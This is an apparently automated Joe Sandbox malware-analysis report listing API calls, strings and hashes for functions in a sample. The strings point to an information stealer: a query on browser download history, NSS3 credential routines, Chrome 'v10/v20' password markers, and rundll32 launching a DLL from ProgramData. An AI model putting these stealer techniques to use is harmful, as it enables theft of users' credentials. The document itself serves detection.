                                                                                                                                                                                                              • API String ID: 1206339513-974084235
                                                                                                                                                                                                              • Opcode ID: 862338497aeefee82ae41348853de130bf3c58978b5555e54667d810899186af
                                                                                                                                                                                                              • Instruction ID: 766a58640f47b9d49e90578c52ca3e25715061bb14f863b54651b92243dc827b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 862338497aeefee82ae41348853de130bf3c58978b5555e54667d810899186af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61F0E9322002197BE7010F59DC48C66BFACDF9D669F0100A0F91C97221CA71CD518BE1
                                                                                                                                                                                                              Function 009329A2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 00932BC4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                              • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              • API String ID: 2215929589-2108736111
                                                                                                                                                                                                              • Opcode ID: 0819a539cc89ab035cf5ae9789101207baafafdde2c8be13fa1358bd96a54826
                                                                                                                                                                                                              • Instruction ID: b18f5ce657f2920b9240701b92a65f50d9f12f0dbd86f6dfeb695dadbfee6875
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0819a539cc89ab035cf5ae9789101207baafafdde2c8be13fa1358bd96a54826
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE71B036D10129ABCF11FBA5ED42BCDB7B4AF84700F514161BA50B7166DB70AE8A8F90
                                                                                                                                                                                                              Function 6CB0FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CB0FC55
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB0FCB2
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB0FDB7
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CB0FDDE
                                                                                                                                                                                                                • Part of subcall function 6CB18800: TlsGetValue.KERNEL32(?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB18821
                                                                                                                                                                                                                • Part of subcall function 6CB18800: TlsGetValue.KERNEL32(?,?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB1883D
                                                                                                                                                                                                                • Part of subcall function 6CB18800: EnterCriticalSection.KERNEL32(?,?,?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB18856
                                                                                                                                                                                                                • Part of subcall function 6CB18800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CB18887
                                                                                                                                                                                                                • Part of subcall function 6CB18800: PR_Unlock.NSS3(?,?,?,?,6CB2085A,00000000,?,6CAC8369,?), ref: 6CB18899
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                              • String ID: pkcs11:
                                                                                                                                                                                                              • API String ID: 362709927-2446828420
                                                                                                                                                                                                              • Opcode ID: 550702c3ac5b0b2f82d240fb621c8402f99526155a3a96f6b002fa4d350d9091
                                                                                                                                                                                                              • Instruction ID: 93a562cef60f6bbc1a6095f2927e34ca731a9b8f9077d0640ce4bf4d3a6753dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 550702c3ac5b0b2f82d240fb621c8402f99526155a3a96f6b002fa4d350d9091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF51EEB1B042E19BEF108F689C41B9E3B75FB40359F190225DD04ABF51EB31E809CB9A
                                                                                                                                                                                                              Function 0092826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 130memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092830C
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 00928341
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLocal_memset
                                                                                                                                                                                                              • String ID: ERROR_V128$v10$v20
                                                                                                                                                                                                              • API String ID: 52611349-1964637325
                                                                                                                                                                                                              • Opcode ID: 1a3abff22741195293c8972ee2df9f6f6eab389811952e8e4bb40a5188cd6cd4
                                                                                                                                                                                                              • Instruction ID: d0718d72a7f1ac5a65e74c853e5c06a420b4c8ada6a692162f18060fefe62023
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a3abff22741195293c8972ee2df9f6f6eab389811952e8e4bb40a5188cd6cd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C341B472A01128ABCB10DFB5EC45AEF7BA8AF84714F154525FD04E7284EB70DE458B90
                                                                                                                                                                                                              Function 6CA4BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CA4BE02
                                                                                                                                                                                                                • Part of subcall function 6CB79C40: memcmp.VCRUNTIME140(?,00000000,6CA4C52B), ref: 6CB79D53
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4BE9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CA4BE93
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA4BE89
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA4BE98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 1135338897-598938438
                                                                                                                                                                                                              • Opcode ID: fc0dbe38c37b0e495dd5e8d050885a255f8d995c21e089e9c7e7278132394f7a
                                                                                                                                                                                                              • Instruction ID: 2a0602787834c1957ac2bb6b6be5860088b6169ce114a6151b3e7f894c2c47a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0dbe38c37b0e495dd5e8d050885a255f8d995c21e089e9c7e7278132394f7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64315431A44A958BC704CF69E896EAFBBB2AF81314B1DC654EE581BB41D330EC85C3D0
                                                                                                                                                                                                              Function 0092F286 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F29C
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EDEA
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: __CxxThrowException@8.LIBCMT ref: 0094EDFF
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EE10
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F2BB
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0092F2F5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 3404309857-4289949731
                                                                                                                                                                                                              • Opcode ID: af98f26af441e86a0e7c79870a9f223c293db1c908a7907b37c13cdc124dafc5
                                                                                                                                                                                                              • Instruction ID: 07a4a6aefc8117c0daf61416c7389b6fa22fc5b7d425cd1a7363c41e56bdb505
                                                                                                                                                                                                              • Opcode Fuzzy Hash: af98f26af441e86a0e7c79870a9f223c293db1c908a7907b37c13cdc124dafc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66119E75300226DF9B04EE68E8A1E59B3B9FF453647500938F826CB68AC370E940CB94
                                                                                                                                                                                                              Function 6CAB0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CAB0BDE), ref: 6CAB0DCB
                                                                                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,?,6CAB0BDE), ref: 6CAB0DEA
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CAB0BDE), ref: 6CAB0DFC
                                                                                                                                                                                                              • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CAB0BDE), ref: 6CAB0E32
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s incr => %d (find lib), xrefs: 6CAB0E2D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                              • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                              • API String ID: 97259331-2309350800
                                                                                                                                                                                                              • Opcode ID: 2acfbaa20551cc583d8d40d281ffc6dd2b20d601f9ff7495e03dbfa0f940747c
                                                                                                                                                                                                              • Instruction ID: 7d1e15eed8312d63c5065fa92e364d7b53bd69ef5e56c7369eded746dd7e5236
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2acfbaa20551cc583d8d40d281ffc6dd2b20d601f9ff7495e03dbfa0f940747c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01D4B2700654AFE6209F259C46E1BB3BCDF45A09B05446DE909E3A41E762FC5886E1
                                                                                                                                                                                                              Function 6CA59C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CA59CF2
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6CA59D45
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CA59D8B
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6CA59DDE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              • Opcode ID: 9e1c4ce5485549b64f860146cc691a812516c6ccdfcb73545891b723b0c0770c
                                                                                                                                                                                                              • Instruction ID: caa9ef53fdcf7de2c9affb78bf76609c0e9d2f12a30ed2f9c746a480c16818c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e1c4ce5485549b64f860146cc691a812516c6ccdfcb73545891b723b0c0770c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A161B17041008FEB08DF35DA89B6A7775BB46315F58812DE8068BE40DB3A98D7DB92
                                                                                                                                                                                                              Function 00929278 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092947C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929497
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                              • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                              • API String ID: 2500673778-2241552939
                                                                                                                                                                                                              • Opcode ID: 0eacaf2b13c2baca473daf1f1ac590590b201994870cb7ca256f495c553d882b
                                                                                                                                                                                                              • Instruction ID: 6f1043a26f65e46d10c36291155a8c7c8b2f133241ca3fcae57c4c2e6d7676d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eacaf2b13c2baca473daf1f1ac590590b201994870cb7ca256f495c553d882b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD71E536900129ABCF05FFA5EE43ADDB774AF84305F514121F950B706ADB60BE8A8F91
                                                                                                                                                                                                              Function 6CB6DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DE1B
                                                                                                                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CB6DE77
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2700453212-0
                                                                                                                                                                                                              • Opcode ID: 1bd40981f08325fa997d2231ca832bee5e36db316787db991e808c7610808951
                                                                                                                                                                                                              • Instruction ID: 1cc1cacab3b37365d097a68b3cc2ea5f5a25b212a8183ebdf87fbf3678863626
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bd40981f08325fa997d2231ca832bee5e36db316787db991e808c7610808951
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E715571A00318CFDF10CFAAD580A8AB7B4FF89718F25816DD9596BB02D770A946CF91
                                                                                                                                                                                                              Function 6CAEBE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CAEBF06
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAEBF56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,6CAC9F71,?,?,00000000), ref: 6CAEBF7F
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CAEBFA9
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAEC014
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
